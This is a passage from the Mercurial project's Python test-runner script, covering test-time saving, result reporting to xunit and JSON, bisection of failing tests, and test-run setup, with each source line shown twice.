2540 test, real = tdata[0], tdata[3]
2540 test, real = tdata[0], tdata[3]
2541 if test not in skipped:
2541 if test not in skipped:
2542 ts = saved.setdefault(test, [])
2542 ts = saved.setdefault(test, [])
2543 ts.append(real)
2543 ts.append(real)
2544 ts[:] = ts[-maxruns:]
2544 ts[:] = ts[-maxruns:]
2545
2545
2546 fd, tmpname = tempfile.mkstemp(
2546 fd, tmpname = tempfile.mkstemp(
2547 prefix=b'.testtimes', dir=outputdir, text=True
2547 prefix=b'.testtimes', dir=outputdir, text=True
2548 )
2548 )
2549 with os.fdopen(fd, 'w') as fp:
2549 with os.fdopen(fd, 'w') as fp:
2550 for name, ts in sorted(saved.items()):
2550 for name, ts in sorted(saved.items()):
2551 fp.write('%s %s\n' % (name, ' '.join(['%.3f' % (t,) for t in ts])))
2551 fp.write('%s %s\n' % (name, ' '.join(['%.3f' % (t,) for t in ts])))
2552 timepath = os.path.join(outputdir, b'.testtimes')
2552 timepath = os.path.join(outputdir, b'.testtimes')
2553 try:
2553 try:
2554 os.unlink(timepath)
2554 os.unlink(timepath)
2555 except OSError:
2555 except OSError:
2556 pass
2556 pass
2557 try:
2557 try:
2558 os.rename(tmpname, timepath)
2558 os.rename(tmpname, timepath)
2559 except OSError:
2559 except OSError:
2560 pass
2560 pass
2561
2561
2562
2562
2563 class TextTestRunner(unittest.TextTestRunner):
2563 class TextTestRunner(unittest.TextTestRunner):
2564 """Custom unittest test runner that uses appropriate settings."""
2564 """Custom unittest test runner that uses appropriate settings."""
2565
2565
2566 def __init__(self, runner, *args, **kwargs):
2566 def __init__(self, runner, *args, **kwargs):
2567 super(TextTestRunner, self).__init__(*args, **kwargs)
2567 super(TextTestRunner, self).__init__(*args, **kwargs)
2568
2568
2569 self._runner = runner
2569 self._runner = runner
2570
2570
2571 self._result = getTestResult()(
2571 self._result = getTestResult()(
2572 self._runner.options, self.stream, self.descriptions, self.verbosity
2572 self._runner.options, self.stream, self.descriptions, self.verbosity
2573 )
2573 )
2574
2574
2575 def listtests(self, test):
2575 def listtests(self, test):
2576 test = sorted(test, key=lambda t: t.name)
2576 test = sorted(test, key=lambda t: t.name)
2577
2577
2578 self._result.onStart(test)
2578 self._result.onStart(test)
2579
2579
2580 for t in test:
2580 for t in test:
2581 print(t.name)
2581 print(t.name)
2582 self._result.addSuccess(t)
2582 self._result.addSuccess(t)
2583
2583
2584 if self._runner.options.xunit:
2584 if self._runner.options.xunit:
2585 with open(self._runner.options.xunit, "wb") as xuf:
2585 with open(self._runner.options.xunit, "wb") as xuf:
2586 self._writexunit(self._result, xuf)
2586 self._writexunit(self._result, xuf)
2587
2587
2588 if self._runner.options.json:
2588 if self._runner.options.json:
2589 jsonpath = os.path.join(self._runner._outputdir, b'report.json')
2589 jsonpath = os.path.join(self._runner._outputdir, b'report.json')
2590 with open(jsonpath, 'w') as fp:
2590 with open(jsonpath, 'w') as fp:
2591 self._writejson(self._result, fp)
2591 self._writejson(self._result, fp)
2592
2592
2593 return self._result
2593 return self._result
2594
2594
2595 def run(self, test):
2595 def run(self, test):
2596 self._result.onStart(test)
2596 self._result.onStart(test)
2597 test(self._result)
2597 test(self._result)
2598
2598
2599 failed = len(self._result.failures)
2599 failed = len(self._result.failures)
2600 skipped = len(self._result.skipped)
2600 skipped = len(self._result.skipped)
2601 ignored = len(self._result.ignored)
2601 ignored = len(self._result.ignored)
2602
2602
2603 with iolock:
2603 with iolock:
2604 self.stream.writeln('')
2604 self.stream.writeln('')
2605
2605
2606 if not self._runner.options.noskips:
2606 if not self._runner.options.noskips:
2607 for test, msg in sorted(
2607 for test, msg in sorted(
2608 self._result.skipped, key=lambda s: s[0].name
2608 self._result.skipped, key=lambda s: s[0].name
2609 ):
2609 ):
2610 formatted = 'Skipped %s: %s\n' % (test.name, msg)
2610 formatted = 'Skipped %s: %s\n' % (test.name, msg)
2611 msg = highlightmsg(formatted, self._result.color)
2611 msg = highlightmsg(formatted, self._result.color)
2612 self.stream.write(msg)
2612 self.stream.write(msg)
2613 for test, msg in sorted(
2613 for test, msg in sorted(
2614 self._result.failures, key=lambda f: f[0].name
2614 self._result.failures, key=lambda f: f[0].name
2615 ):
2615 ):
2616 formatted = 'Failed %s: %s\n' % (test.name, msg)
2616 formatted = 'Failed %s: %s\n' % (test.name, msg)
2617 self.stream.write(highlightmsg(formatted, self._result.color))
2617 self.stream.write(highlightmsg(formatted, self._result.color))
2618 for test, msg in sorted(
2618 for test, msg in sorted(
2619 self._result.errors, key=lambda e: e[0].name
2619 self._result.errors, key=lambda e: e[0].name
2620 ):
2620 ):
2621 self.stream.writeln('Errored %s: %s' % (test.name, msg))
2621 self.stream.writeln('Errored %s: %s' % (test.name, msg))
2622
2622
2623 if self._runner.options.xunit:
2623 if self._runner.options.xunit:
2624 with open(self._runner.options.xunit, "wb") as xuf:
2624 with open(self._runner.options.xunit, "wb") as xuf:
2625 self._writexunit(self._result, xuf)
2625 self._writexunit(self._result, xuf)
2626
2626
2627 if self._runner.options.json:
2627 if self._runner.options.json:
2628 jsonpath = os.path.join(self._runner._outputdir, b'report.json')
2628 jsonpath = os.path.join(self._runner._outputdir, b'report.json')
2629 with open(jsonpath, 'w') as fp:
2629 with open(jsonpath, 'w') as fp:
2630 self._writejson(self._result, fp)
2630 self._writejson(self._result, fp)
2631
2631
2632 self._runner._checkhglib('Tested')
2632 self._runner._checkhglib('Tested')
2633
2633
2634 savetimes(self._runner._outputdir, self._result)
2634 savetimes(self._runner._outputdir, self._result)
2635
2635
2636 if failed and self._runner.options.known_good_rev:
2636 if failed and self._runner.options.known_good_rev:
2637 self._bisecttests(t for t, m in self._result.failures)
2637 self._bisecttests(t for t, m in self._result.failures)
2638 self.stream.writeln(
2638 self.stream.writeln(
2639 '# Ran %d tests, %d skipped, %d failed.'
2639 '# Ran %d tests, %d skipped, %d failed.'
2640 % (self._result.testsRun, skipped + ignored, failed)
2640 % (self._result.testsRun, skipped + ignored, failed)
2641 )
2641 )
2642 if failed:
2642 if failed:
2643 self.stream.writeln(
2643 self.stream.writeln(
2644 'python hash seed: %s' % os.environ['PYTHONHASHSEED']
2644 'python hash seed: %s' % os.environ['PYTHONHASHSEED']
2645 )
2645 )
2646 if self._runner.options.time:
2646 if self._runner.options.time:
2647 self.printtimes(self._result.times)
2647 self.printtimes(self._result.times)
2648
2648
2649 if self._runner.options.exceptions:
2649 if self._runner.options.exceptions:
2650 exceptions = aggregateexceptions(
2650 exceptions = aggregateexceptions(
2651 os.path.join(self._runner._outputdir, b'exceptions')
2651 os.path.join(self._runner._outputdir, b'exceptions')
2652 )
2652 )
2653
2653
2654 self.stream.writeln('Exceptions Report:')
2654 self.stream.writeln('Exceptions Report:')
2655 self.stream.writeln(
2655 self.stream.writeln(
2656 '%d total from %d frames'
2656 '%d total from %d frames'
2657 % (exceptions['total'], len(exceptions['exceptioncounts']))
2657 % (exceptions['total'], len(exceptions['exceptioncounts']))
2658 )
2658 )
2659 combined = exceptions['combined']
2659 combined = exceptions['combined']
2660 for key in sorted(combined, key=combined.get, reverse=True):
2660 for key in sorted(combined, key=combined.get, reverse=True):
2661 frame, line, exc = key
2661 frame, line, exc = key
2662 totalcount, testcount, leastcount, leasttest = combined[key]
2662 totalcount, testcount, leastcount, leasttest = combined[key]
2663
2663
2664 self.stream.writeln(
2664 self.stream.writeln(
2665 '%d (%d tests)\t%s: %s (%s - %d total)'
2665 '%d (%d tests)\t%s: %s (%s - %d total)'
2666 % (
2666 % (
2667 totalcount,
2667 totalcount,
2668 testcount,
2668 testcount,
2669 frame,
2669 frame,
2670 exc,
2670 exc,
2671 leasttest,
2671 leasttest,
2672 leastcount,
2672 leastcount,
2673 )
2673 )
2674 )
2674 )
2675
2675
2676 self.stream.flush()
2676 self.stream.flush()
2677
2677
2678 return self._result
2678 return self._result
2679
2679
2680 def _bisecttests(self, tests):
2680 def _bisecttests(self, tests):
2681 bisectcmd = ['hg', 'bisect']
2681 bisectcmd = ['hg', 'bisect']
2682 bisectrepo = self._runner.options.bisect_repo
2682 bisectrepo = self._runner.options.bisect_repo
2683 if bisectrepo:
2683 if bisectrepo:
2684 bisectcmd.extend(['-R', os.path.abspath(bisectrepo)])
2684 bisectcmd.extend(['-R', os.path.abspath(bisectrepo)])
2685
2685
2686 def pread(args):
2686 def pread(args):
2687 env = os.environ.copy()
2687 env = os.environ.copy()
2688 env['HGPLAIN'] = '1'
2688 env['HGPLAIN'] = '1'
2689 p = subprocess.Popen(
2689 p = subprocess.Popen(
2690 args, stderr=subprocess.STDOUT, stdout=subprocess.PIPE, env=env
2690 args, stderr=subprocess.STDOUT, stdout=subprocess.PIPE, env=env
2691 )
2691 )
2692 data = p.stdout.read()
2692 data = p.stdout.read()
2693 p.wait()
2693 p.wait()
2694 return data
2694 return data
2695
2695
2696 for test in tests:
2696 for test in tests:
2697 pread(bisectcmd + ['--reset']),
2697 pread(bisectcmd + ['--reset']),
2698 pread(bisectcmd + ['--bad', '.'])
2698 pread(bisectcmd + ['--bad', '.'])
2699 pread(bisectcmd + ['--good', self._runner.options.known_good_rev])
2699 pread(bisectcmd + ['--good', self._runner.options.known_good_rev])
2700 # TODO: we probably need to forward more options
2700 # TODO: we probably need to forward more options
2701 # that alter hg's behavior inside the tests.
2701 # that alter hg's behavior inside the tests.
2702 opts = ''
2702 opts = ''
2703 withhg = self._runner.options.with_hg
2703 withhg = self._runner.options.with_hg
2704 if withhg:
2704 if withhg:
2705 opts += ' --with-hg=%s ' % shellquote(_strpath(withhg))
2705 opts += ' --with-hg=%s ' % shellquote(_strpath(withhg))
2706 rtc = '%s %s %s %s' % (sysexecutable, sys.argv[0], opts, test)
2706 rtc = '%s %s %s %s' % (sysexecutable, sys.argv[0], opts, test)
2707 data = pread(bisectcmd + ['--command', rtc])
2707 data = pread(bisectcmd + ['--command', rtc])
2708 m = re.search(
2708 m = re.search(
2709 (
2709 (
2710 br'\nThe first (?P<goodbad>bad|good) revision '
2710 br'\nThe first (?P<goodbad>bad|good) revision '
2711 br'is:\nchangeset: +\d+:(?P<node>[a-f0-9]+)\n.*\n'
2711 br'is:\nchangeset: +\d+:(?P<node>[a-f0-9]+)\n.*\n'
2712 br'summary: +(?P<summary>[^\n]+)\n'
2712 br'summary: +(?P<summary>[^\n]+)\n'
2713 ),
2713 ),
2714 data,
2714 data,
2715 (re.MULTILINE | re.DOTALL),
2715 (re.MULTILINE | re.DOTALL),
2716 )
2716 )
2717 if m is None:
2717 if m is None:
2718 self.stream.writeln(
2718 self.stream.writeln(
2719 'Failed to identify failure point for %s' % test
2719 'Failed to identify failure point for %s' % test
2720 )
2720 )
2721 continue
2721 continue
2722 dat = m.groupdict()
2722 dat = m.groupdict()
2723 verb = 'broken' if dat['goodbad'] == b'bad' else 'fixed'
2723 verb = 'broken' if dat['goodbad'] == b'bad' else 'fixed'
2724 self.stream.writeln(
2724 self.stream.writeln(
2725 '%s %s by %s (%s)'
2725 '%s %s by %s (%s)'
2726 % (
2726 % (
2727 test,
2727 test,
2728 verb,
2728 verb,
2729 dat['node'].decode('ascii'),
2729 dat['node'].decode('ascii'),
2730 dat['summary'].decode('utf8', 'ignore'),
2730 dat['summary'].decode('utf8', 'ignore'),
2731 )
2731 )
2732 )
2732 )
2733
2733
2734 def printtimes(self, times):
2734 def printtimes(self, times):
2735 # iolock held by run
2735 # iolock held by run
2736 self.stream.writeln('# Producing time report')
2736 self.stream.writeln('# Producing time report')
2737 times.sort(key=lambda t: (t[3]))
2737 times.sort(key=lambda t: (t[3]))
2738 cols = '%7.3f %7.3f %7.3f %7.3f %7.3f %s'
2738 cols = '%7.3f %7.3f %7.3f %7.3f %7.3f %s'
2739 self.stream.writeln(
2739 self.stream.writeln(
2740 '%-7s %-7s %-7s %-7s %-7s %s'
2740 '%-7s %-7s %-7s %-7s %-7s %s'
2741 % ('start', 'end', 'cuser', 'csys', 'real', 'Test')
2741 % ('start', 'end', 'cuser', 'csys', 'real', 'Test')
2742 )
2742 )
2743 for tdata in times:
2743 for tdata in times:
2744 test = tdata[0]
2744 test = tdata[0]
2745 cuser, csys, real, start, end = tdata[1:6]
2745 cuser, csys, real, start, end = tdata[1:6]
2746 self.stream.writeln(cols % (start, end, cuser, csys, real, test))
2746 self.stream.writeln(cols % (start, end, cuser, csys, real, test))
2747
2747
2748 @staticmethod
2748 @staticmethod
2749 def _writexunit(result, outf):
2749 def _writexunit(result, outf):
2750 # See http://llg.cubic.org/docs/junit/ for a reference.
2750 # See http://llg.cubic.org/docs/junit/ for a reference.
2751 timesd = dict((t[0], t[3]) for t in result.times)
2751 timesd = dict((t[0], t[3]) for t in result.times)
2752 doc = minidom.Document()
2752 doc = minidom.Document()
2753 s = doc.createElement('testsuite')
2753 s = doc.createElement('testsuite')
2754 s.setAttribute('errors', "0") # TODO
2754 s.setAttribute('errors', "0") # TODO
2755 s.setAttribute('failures', str(len(result.failures)))
2755 s.setAttribute('failures', str(len(result.failures)))
2756 s.setAttribute('name', 'run-tests')
2756 s.setAttribute('name', 'run-tests')
2757 s.setAttribute(
2757 s.setAttribute(
2758 'skipped', str(len(result.skipped) + len(result.ignored))
2758 'skipped', str(len(result.skipped) + len(result.ignored))
2759 )
2759 )
2760 s.setAttribute('tests', str(result.testsRun))
2760 s.setAttribute('tests', str(result.testsRun))
2761 doc.appendChild(s)
2761 doc.appendChild(s)
2762 for tc in result.successes:
2762 for tc in result.successes:
2763 t = doc.createElement('testcase')
2763 t = doc.createElement('testcase')
2764 t.setAttribute('name', tc.name)
2764 t.setAttribute('name', tc.name)
2765 tctime = timesd.get(tc.name)
2765 tctime = timesd.get(tc.name)
2766 if tctime is not None:
2766 if tctime is not None:
2767 t.setAttribute('time', '%.3f' % tctime)
2767 t.setAttribute('time', '%.3f' % tctime)
2768 s.appendChild(t)
2768 s.appendChild(t)
2769 for tc, err in sorted(result.faildata.items()):
2769 for tc, err in sorted(result.faildata.items()):
2770 t = doc.createElement('testcase')
2770 t = doc.createElement('testcase')
2771 t.setAttribute('name', tc)
2771 t.setAttribute('name', tc)
2772 tctime = timesd.get(tc)
2772 tctime = timesd.get(tc)
2773 if tctime is not None:
2773 if tctime is not None:
2774 t.setAttribute('time', '%.3f' % tctime)
2774 t.setAttribute('time', '%.3f' % tctime)
2775 # createCDATASection expects a unicode or it will
2775 # createCDATASection expects a unicode or it will
2776 # convert using default conversion rules, which will
2776 # convert using default conversion rules, which will
2777 # fail if string isn't ASCII.
2777 # fail if string isn't ASCII.
2778 err = cdatasafe(err).decode('utf-8', 'replace')
2778 err = cdatasafe(err).decode('utf-8', 'replace')
2779 cd = doc.createCDATASection(err)
2779 cd = doc.createCDATASection(err)
2780 # Use 'failure' here instead of 'error' to match errors = 0,
2780 # Use 'failure' here instead of 'error' to match errors = 0,
2781 # failures = len(result.failures) in the testsuite element.
2781 # failures = len(result.failures) in the testsuite element.
2782 failelem = doc.createElement('failure')
2782 failelem = doc.createElement('failure')
2783 failelem.setAttribute('message', 'output changed')
2783 failelem.setAttribute('message', 'output changed')
2784 failelem.setAttribute('type', 'output-mismatch')
2784 failelem.setAttribute('type', 'output-mismatch')
2785 failelem.appendChild(cd)
2785 failelem.appendChild(cd)
2786 t.appendChild(failelem)
2786 t.appendChild(failelem)
2787 s.appendChild(t)
2787 s.appendChild(t)
2788 for tc, message in result.skipped:
2788 for tc, message in result.skipped:
2789 # According to the schema, 'skipped' has no attributes. So store
2789 # According to the schema, 'skipped' has no attributes. So store
2790 # the skip message as a text node instead.
2790 # the skip message as a text node instead.
2791 t = doc.createElement('testcase')
2791 t = doc.createElement('testcase')
2792 t.setAttribute('name', tc.name)
2792 t.setAttribute('name', tc.name)
2793 binmessage = message.encode('utf-8')
2793 binmessage = message.encode('utf-8')
2794 message = cdatasafe(binmessage).decode('utf-8', 'replace')
2794 message = cdatasafe(binmessage).decode('utf-8', 'replace')
2795 cd = doc.createCDATASection(message)
2795 cd = doc.createCDATASection(message)
2796 skipelem = doc.createElement('skipped')
2796 skipelem = doc.createElement('skipped')
2797 skipelem.appendChild(cd)
2797 skipelem.appendChild(cd)
2798 t.appendChild(skipelem)
2798 t.appendChild(skipelem)
2799 s.appendChild(t)
2799 s.appendChild(t)
2800 outf.write(doc.toprettyxml(indent=' ', encoding='utf-8'))
2800 outf.write(doc.toprettyxml(indent=' ', encoding='utf-8'))
2801
2801
2802 @staticmethod
2802 @staticmethod
2803 def _writejson(result, outf):
2803 def _writejson(result, outf):
2804 timesd = {}
2804 timesd = {}
2805 for tdata in result.times:
2805 for tdata in result.times:
2806 test = tdata[0]
2806 test = tdata[0]
2807 timesd[test] = tdata[1:]
2807 timesd[test] = tdata[1:]
2808
2808
2809 outcome = {}
2809 outcome = {}
2810 groups = [
2810 groups = [
2811 ('success', ((tc, None) for tc in result.successes)),
2811 ('success', ((tc, None) for tc in result.successes)),
2812 ('failure', result.failures),
2812 ('failure', result.failures),
2813 ('skip', result.skipped),
2813 ('skip', result.skipped),
2814 ]
2814 ]
2815 for res, testcases in groups:
2815 for res, testcases in groups:
2816 for tc, __ in testcases:
2816 for tc, __ in testcases:
2817 if tc.name in timesd:
2817 if tc.name in timesd:
2818 diff = result.faildata.get(tc.name, b'')
2818 diff = result.faildata.get(tc.name, b'')
2819 try:
2819 try:
2820 diff = diff.decode('unicode_escape')
2820 diff = diff.decode('unicode_escape')
2821 except UnicodeDecodeError as e:
2821 except UnicodeDecodeError as e:
2822 diff = '%r decoding diff, sorry' % e
2822 diff = '%r decoding diff, sorry' % e
2823 tres = {
2823 tres = {
2824 'result': res,
2824 'result': res,
2825 'time': ('%0.3f' % timesd[tc.name][2]),
2825 'time': ('%0.3f' % timesd[tc.name][2]),
2826 'cuser': ('%0.3f' % timesd[tc.name][0]),
2826 'cuser': ('%0.3f' % timesd[tc.name][0]),
2827 'csys': ('%0.3f' % timesd[tc.name][1]),
2827 'csys': ('%0.3f' % timesd[tc.name][1]),
2828 'start': ('%0.3f' % timesd[tc.name][3]),
2828 'start': ('%0.3f' % timesd[tc.name][3]),
2829 'end': ('%0.3f' % timesd[tc.name][4]),
2829 'end': ('%0.3f' % timesd[tc.name][4]),
2830 'diff': diff,
2830 'diff': diff,
2831 }
2831 }
2832 else:
2832 else:
2833 # blacklisted test
2833 # blacklisted test
2834 tres = {'result': res}
2834 tres = {'result': res}
2835
2835
2836 outcome[tc.name] = tres
2836 outcome[tc.name] = tres
2837 jsonout = json.dumps(
2837 jsonout = json.dumps(
2838 outcome, sort_keys=True, indent=4, separators=(',', ': ')
2838 outcome, sort_keys=True, indent=4, separators=(',', ': ')
2839 )
2839 )
2840 outf.writelines(("testreport =", jsonout))
2840 outf.writelines(("testreport =", jsonout))
2841
2841
2842
2842
2843 def sorttests(testdescs, previoustimes, shuffle=False):
2843 def sorttests(testdescs, previoustimes, shuffle=False):
2844 """Do an in-place sort of tests."""
2844 """Do an in-place sort of tests."""
2845 if shuffle:
2845 if shuffle:
2846 random.shuffle(testdescs)
2846 random.shuffle(testdescs)
2847 return
2847 return
2848
2848
2849 if previoustimes:
2849 if previoustimes:
2850
2850
2851 def sortkey(f):
2851 def sortkey(f):
2852 f = f['path']
2852 f = f['path']
2853 if f in previoustimes:
2853 if f in previoustimes:
2854 # Use most recent time as estimate
2854 # Use most recent time as estimate
2855 return -(previoustimes[f][-1])
2855 return -(previoustimes[f][-1])
2856 else:
2856 else:
2857 # Default to a rather arbitrary value of 1 second for new tests
2857 # Default to a rather arbitrary value of 1 second for new tests
2858 return -1.0
2858 return -1.0
2859
2859
2860 else:
2860 else:
2861 # keywords for slow tests
2861 # keywords for slow tests
2862 slow = {
2862 slow = {
2863 b'svn': 10,
2863 b'svn': 10,
2864 b'cvs': 10,
2864 b'cvs': 10,
2865 b'hghave': 10,
2865 b'hghave': 10,
2866 b'largefiles-update': 10,
2866 b'largefiles-update': 10,
2867 b'run-tests': 10,
2867 b'run-tests': 10,
2868 b'corruption': 10,
2868 b'corruption': 10,
2869 b'race': 10,
2869 b'race': 10,
2870 b'i18n': 10,
2870 b'i18n': 10,
2871 b'check': 100,
2871 b'check': 100,
2872 b'gendoc': 100,
2872 b'gendoc': 100,
2873 b'contrib-perf': 200,
2873 b'contrib-perf': 200,
2874 b'merge-combination': 100,
2874 b'merge-combination': 100,
2875 }
2875 }
2876 perf = {}
2876 perf = {}
2877
2877
2878 def sortkey(f):
2878 def sortkey(f):
2879 # run largest tests first, as they tend to take the longest
2879 # run largest tests first, as they tend to take the longest
2880 f = f['path']
2880 f = f['path']
2881 try:
2881 try:
2882 return perf[f]
2882 return perf[f]
2883 except KeyError:
2883 except KeyError:
2884 try:
2884 try:
2885 val = -os.stat(f).st_size
2885 val = -os.stat(f).st_size
2886 except OSError as e:
2886 except OSError as e:
2887 if e.errno != errno.ENOENT:
2887 if e.errno != errno.ENOENT:
2888 raise
2888 raise
2889 perf[f] = -1e9 # file does not exist, tell early
2889 perf[f] = -1e9 # file does not exist, tell early
2890 return -1e9
2890 return -1e9
2891 for kw, mul in slow.items():
2891 for kw, mul in slow.items():
2892 if kw in f:
2892 if kw in f:
2893 val *= mul
2893 val *= mul
2894 if f.endswith(b'.py'):
2894 if f.endswith(b'.py'):
2895 val /= 10.0
2895 val /= 10.0
2896 perf[f] = val / 1000.0
2896 perf[f] = val / 1000.0
2897 return perf[f]
2897 return perf[f]
2898
2898
2899 testdescs.sort(key=sortkey)
2899 testdescs.sort(key=sortkey)
2900
2900
2901
2901
2902 class TestRunner(object):
2902 class TestRunner(object):
2903 """Holds context for executing tests.
2903 """Holds context for executing tests.
2904
2904
2905 Tests rely on a lot of state. This object holds it for them.
2905 Tests rely on a lot of state. This object holds it for them.
2906 """
2906 """
2907
2907
2908 # Programs required to run tests.
2908 # Programs required to run tests.
2909 REQUIREDTOOLS = [
2909 REQUIREDTOOLS = [
2910 b'diff',
2910 b'diff',
2911 b'grep',
2911 b'grep',
2912 b'unzip',
2912 b'unzip',
2913 b'gunzip',
2913 b'gunzip',
2914 b'bunzip2',
2914 b'bunzip2',
2915 b'sed',
2915 b'sed',
2916 ]
2916 ]
2917
2917
2918 # Maps file extensions to test class.
2918 # Maps file extensions to test class.
2919 TESTTYPES = [
2919 TESTTYPES = [
2920 (b'.py', PythonTest),
2920 (b'.py', PythonTest),
2921 (b'.t', TTest),
2921 (b'.t', TTest),
2922 ]
2922 ]
2923
2923
2924 def __init__(self):
2924 def __init__(self):
2925 self.options = None
2925 self.options = None
2926 self._hgroot = None
2926 self._hgroot = None
2927 self._testdir = None
2927 self._testdir = None
2928 self._outputdir = None
2928 self._outputdir = None
2929 self._hgtmp = None
2929 self._hgtmp = None
2930 self._installdir = None
2930 self._installdir = None
2931 self._bindir = None
2931 self._bindir = None
2932 self._tmpbinddir = None
2932 self._tmpbinddir = None
2933 self._pythondir = None
2933 self._pythondir = None
2934 self._coveragefile = None
2934 self._coveragefile = None
2935 self._createdfiles = []
2935 self._createdfiles = []
2936 self._hgcommand = None
2936 self._hgcommand = None
2937 self._hgpath = None
2937 self._hgpath = None
2938 self._portoffset = 0
2938 self._portoffset = 0
2939 self._ports = {}
2939 self._ports = {}
2940
2940
2941 def run(self, args, parser=None):
2941 def run(self, args, parser=None):
2942 """Run the test suite."""
2942 """Run the test suite."""
2943 oldmask = os.umask(0o22)
2943 oldmask = os.umask(0o22)
2944 try:
2944 try:
2945 parser = parser or getparser()
2945 parser = parser or getparser()
2946 options = parseargs(args, parser)
2946 options = parseargs(args, parser)
2947 tests = [_bytespath(a) for a in options.tests]
2947 tests = [_bytespath(a) for a in options.tests]
2948 if options.test_list is not None:
2948 if options.test_list is not None:
2949 for listfile in options.test_list:
2949 for listfile in options.test_list:
2950 with open(listfile, 'rb') as f:
2950 with open(listfile, 'rb') as f:
2951 tests.extend(t for t in f.read().splitlines() if t)
2951 tests.extend(t for t in f.read().splitlines() if t)
2952 self.options = options
2952 self.options = options
2953
2953
2954 self._checktools()
2954 self._checktools()
2955 testdescs = self.findtests(tests)
2955 testdescs = self.findtests(tests)
2956 if options.profile_runner:
2956 if options.profile_runner:
2957 import statprof
2957 import statprof
2958
2958
2959 statprof.start()
2959 statprof.start()
2960 result = self._run(testdescs)
2960 result = self._run(testdescs)
2961 if options.profile_runner:
2961 if options.profile_runner:
2962 statprof.stop()
2962 statprof.stop()
2963 statprof.display()
2963 statprof.display()
2964 return result
2964 return result
2965
2965
2966 finally:
2966 finally:
2967 os.umask(oldmask)
2967 os.umask(oldmask)
2968
2968
2969 def _run(self, testdescs):
2969 def _run(self, testdescs):
2970 testdir = getcwdb()
2970 testdir = getcwdb()
2971 self._testdir = osenvironb[b'TESTDIR'] = getcwdb()
2971 self._testdir = osenvironb[b'TESTDIR'] = getcwdb()
2972 # assume all tests in same folder for now
2972 # assume all tests in same folder for now
2973 if testdescs:
2973 if testdescs:
2974 pathname = os.path.dirname(testdescs[0]['path'])
2974 pathname = os.path.dirname(testdescs[0]['path'])
2975 if pathname:
2975 if pathname:
2976 testdir = os.path.join(testdir, pathname)
2976 testdir = os.path.join(testdir, pathname)
2977 self._testdir = osenvironb[b'TESTDIR'] = testdir
2977 self._testdir = osenvironb[b'TESTDIR'] = testdir
2978 if self.options.outputdir:
2978 if self.options.outputdir:
2979 self._outputdir = canonpath(_bytespath(self.options.outputdir))
2979 self._outputdir = canonpath(_bytespath(self.options.outputdir))
2980 else:
2980 else:
2981 self._outputdir = getcwdb()
2981 self._outputdir = getcwdb()
2982 if testdescs and pathname:
2982 if testdescs and pathname:
2983 self._outputdir = os.path.join(self._outputdir, pathname)
2983 self._outputdir = os.path.join(self._outputdir, pathname)
2984 previoustimes = {}
2984 previoustimes = {}
2985 if self.options.order_by_runtime:
2985 if self.options.order_by_runtime:
2986 previoustimes = dict(loadtimes(self._outputdir))
2986 previoustimes = dict(loadtimes(self._outputdir))
2987 sorttests(testdescs, previoustimes, shuffle=self.options.random)
2987 sorttests(testdescs, previoustimes, shuffle=self.options.random)
2988
2988
2989 if 'PYTHONHASHSEED' not in os.environ:
2989 if 'PYTHONHASHSEED' not in os.environ:
2990 # use a random python hash seed all the time
2990 # use a random python hash seed all the time
2991 # we do the randomness ourself to know what seed is used
2991 # we do the randomness ourself to know what seed is used
2992 os.environ['PYTHONHASHSEED'] = str(random.getrandbits(32))
2992 os.environ['PYTHONHASHSEED'] = str(random.getrandbits(32))
2993
2993
2994 if self.options.tmpdir:
2994 if self.options.tmpdir:
2995 self.options.keep_tmpdir = True
2995 self.options.keep_tmpdir = True
2996 tmpdir = _bytespath(self.options.tmpdir)
2996 tmpdir = _bytespath(self.options.tmpdir)
2997 if os.path.exists(tmpdir):
2997 if os.path.exists(tmpdir):
2998 # Meaning of tmpdir has changed since 1.3: we used to create
2998 # Meaning of tmpdir has changed since 1.3: we used to create
2999 # HGTMP inside tmpdir; now HGTMP is tmpdir. So fail if
2999 # HGTMP inside tmpdir; now HGTMP is tmpdir. So fail if
3000 # tmpdir already exists.
3000 # tmpdir already exists.
3001 print("error: temp dir %r already exists" % tmpdir)
3001 print("error: temp dir %r already exists" % tmpdir)
3002 return 1
3002 return 1
3003
3003
3004 os.makedirs(tmpdir)
3004 os.makedirs(tmpdir)
3005 else:
3005 else:
3006 d = None
3006 d = None
3007 if os.name == 'nt':
3007 if os.name == 'nt':
3008 # without this, we get the default temp dir location, but
3008 # without this, we get the default temp dir location, but
3009 # in all lowercase, which causes troubles with paths (issue3490)
3009 # in all lowercase, which causes troubles with paths (issue3490)
3010 d = osenvironb.get(b'TMP', None)
3010 d = osenvironb.get(b'TMP', None)
3011 tmpdir = tempfile.mkdtemp(b'', b'hgtests.', d)
3011 tmpdir = tempfile.mkdtemp(b'', b'hgtests.', d)
3012
3012
3013 self._hgtmp = osenvironb[b'HGTMP'] = os.path.realpath(tmpdir)
3013 self._hgtmp = osenvironb[b'HGTMP'] = os.path.realpath(tmpdir)
3014
3014
3015 if self.options.with_hg:
3015 if self.options.with_hg:
3016 self._installdir = None
3016 self._installdir = None
3017 whg = self.options.with_hg
3017 whg = self.options.with_hg
3018 self._bindir = os.path.dirname(os.path.realpath(whg))
3018 self._bindir = os.path.dirname(os.path.realpath(whg))
3019 assert isinstance(self._bindir, bytes)
3019 assert isinstance(self._bindir, bytes)
3020 self._hgcommand = os.path.basename(whg)
3020 self._hgcommand = os.path.basename(whg)
3021 self._tmpbindir = os.path.join(self._hgtmp, b'install', b'bin')
3021 self._tmpbindir = os.path.join(self._hgtmp, b'install', b'bin')
3022 os.makedirs(self._tmpbindir)
3022 os.makedirs(self._tmpbindir)
3023
3023
3024 normbin = os.path.normpath(os.path.abspath(whg))
3024 normbin = os.path.normpath(os.path.abspath(whg))
3025 normbin = normbin.replace(os.sep.encode('ascii'), b'/')
3025 normbin = normbin.replace(os.sep.encode('ascii'), b'/')
3026
3026
3027 # Other Python scripts in the test harness need to
3027 # Other Python scripts in the test harness need to
3028 # `import mercurial`. If `hg` is a Python script, we assume
3028 # `import mercurial`. If `hg` is a Python script, we assume
3029 # the Mercurial modules are relative to its path and tell the tests
3029 # the Mercurial modules are relative to its path and tell the tests
3030 # to load Python modules from its directory.
3030 # to load Python modules from its directory.
3031 with open(whg, 'rb') as fh:
3031 with open(whg, 'rb') as fh:
3032 initial = fh.read(1024)
3032 initial = fh.read(1024)
3033
3033
3034 if re.match(b'#!.*python', initial):
3034 if re.match(b'#!.*python', initial):
3035 self._pythondir = self._bindir
3035 self._pythondir = self._bindir
3036 # If it looks like our in-repo Rust binary, use the source root.
3036 # If it looks like our in-repo Rust binary, use the source root.
3037 # This is a bit hacky. But rhg is still not supported outside the
3037 # This is a bit hacky. But rhg is still not supported outside the
3038 # source directory. So until it is, do the simple thing.
